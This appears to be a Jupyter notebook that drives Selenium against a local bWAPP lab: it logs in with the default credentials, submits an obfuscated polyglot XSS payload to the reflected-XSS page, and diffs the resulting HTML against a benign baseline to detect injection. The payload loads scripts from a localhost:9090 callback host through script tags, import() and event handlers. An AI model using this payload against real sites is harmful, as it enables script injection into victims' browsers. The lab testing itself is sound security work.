In [9]:
from bs4 import BeautifulSoup
from deepdiff import DeepDiff

In [10]:
html = open("res/expected.html").read()
soup = BeautifulSoup(html, "html.parser")
html2 = open("res/7.html").read()
soup2 = BeautifulSoup(html2, "html.parser")

list(list(soup.body.children)[5].children)[8]
list(list(soup2.body.children)[5].children)[8]

'\n    Welcome '

In [11]:
DeepDiff(soup, soup2).keys()

dict_keys(['values_changed', 'iterable_item_added', 'iterable_item_removed'])

In [12]:
DeepDiff(soup, soup2)['iterable_item_added'].keys()

dict_keys(['root[2][3][5][9]'])

In [13]:
DeepDiff(soup, soup2)['iterable_item_removed'].keys()

dict_keys(['root[2][3][6]', 'root[2][3][7]', 'root[2][3][8]', 'root[2][3][9]', 'root[2][3][10]', 'root[2][3][11]', 'root[2][3][12]', 'root[2][3][13]', 'root[2][3][14]', 'root[2][3][15]', 'root[2][3][16]'])

In [14]:
from selenium import webdriver
from selenium.webdriver.common.by import By

def xss_reflected_get_firstname(driver, payload):
    driver.get("http://127.0.0.1:4040/bWAPP/xss_get.php")
    driver.find_element(By.ID, "firstname").send_keys(payload)
    driver.find_element(By.ID, "lastname").send_keys("test")
    driver.find_element(By.NAME, 'form').click()
    html = driver.page_source
    return html

def login(driver):
    driver.get("http://127.0.0.1:4040/bWAPP/login.php")
    driver.find_element(By.NAME, "login").send_keys("bee")
    driver.find_element(By.NAME, "password").send_keys("bug")
    driver.find_element(By.NAME, 'form').click()

In [19]:
driver = webdriver.Chrome()

payload = "\"<ScRiPt sRc=`http://localhost:9090`></ScRiPt>nOeMbed><ScRiPt sRc='http://localhost:9090'></ScRiPt>\"&gt;import(`http://localhost:9090`) <!--hTmL>' oNLoAd= )texTarEa&gt;<iMg-<ScRiPt sRc=`http://localhost:9090`></ScRiPt> oNFoCus=*/';/ifRaMe>hTmL> oNtOgGle=/*`>/sOurCe&gt; oNmOuSeLeaVe= > OnBlUr= <ScRiPt sRc='http://localhost:9090'></ScRiPt>iMg/* onClICk=import(\"http://localhost:9090\")"

login(driver)
expected_html = xss_reflected_get_firstname(driver, "test")
alt_expected_html = xss_reflected_get_firstname(driver, "alt_sane_payload")
payload_html = xss_reflected_get_firstname(driver, payload)
driver.quit()

soup_expected = BeautifulSoup(expected_html, "html.parser")
soup_alt_expected = BeautifulSoup(alt_expected_html, "html.parser")

diff_expectation = DeepDiff(soup_expected, soup_alt_expected)
print(diff_expectation.keys())
if 'iterable_item_removed' in diff_expectation:
    print("---- ITEMS REMOVE EXPECTED ----")
    print(diff_expectation['iterable_item_removed'].keys())
if 'iterable_item_added' in diff_expectation:
    print("---- ITEMS ADD EXPECTED ----")
    print(diff_expectation['iterable_item_added'].keys())
if 'values_changed' in diff_expectation:
    print("---- ITEMS CHANGE EXPECTED ----")
    print(diff_expectation['values_changed'].keys())


print("\n\n\n---- EXPERIMENT ----")

soup_payload = BeautifulSoup(payload_html, "html.parser")
diff_payload = DeepDiff(soup_expected, soup_payload)

print(diff_payload.keys())
if 'iterable_item_removed' in diff_payload:
    print("---- ITEMS REMOVED ----")
    print(diff_payload['iterable_item_removed'].keys())
if 'iterable_item_added' in diff_payload:
    print("---- ITEMS ADDED ----")
    print(diff_payload['iterable_item_added'].keys())
if 'values_changed' in diff_payload:
    print("---- ITEMS CHANGED ----")
    print(diff_payload['values_changed'].keys())



dict_keys(['values_changed'])
---- ITEMS CHANGE EXPECTED ----
dict_keys(['root[0][2][5][8]'])



---- EXPERIMENT ----
dict_keys(['values_changed', 'iterable_item_added', 'iterable_item_removed'])
---- ITEMS REMOVED ----
dict_keys(['root[0][2][6]', 'root[0][2][7]', 'root[0][2][8]', 'root[0][2][9]', 'root[0][2][10]', 'root[0][2][11]', 'root[0][2][12]', 'root[0][2][13]', 'root[0][2][14]', 'root[0][2][15]', 'root[0][2][16]'])
---- ITEMS ADDED ----
dict_keys(['root[0][2][5][9]', 'root[0][2][5][10]', 'root[0][2][5][11]'])
---- ITEMS CHANGED ----
dict_keys(['root[0][2][5][8]'])
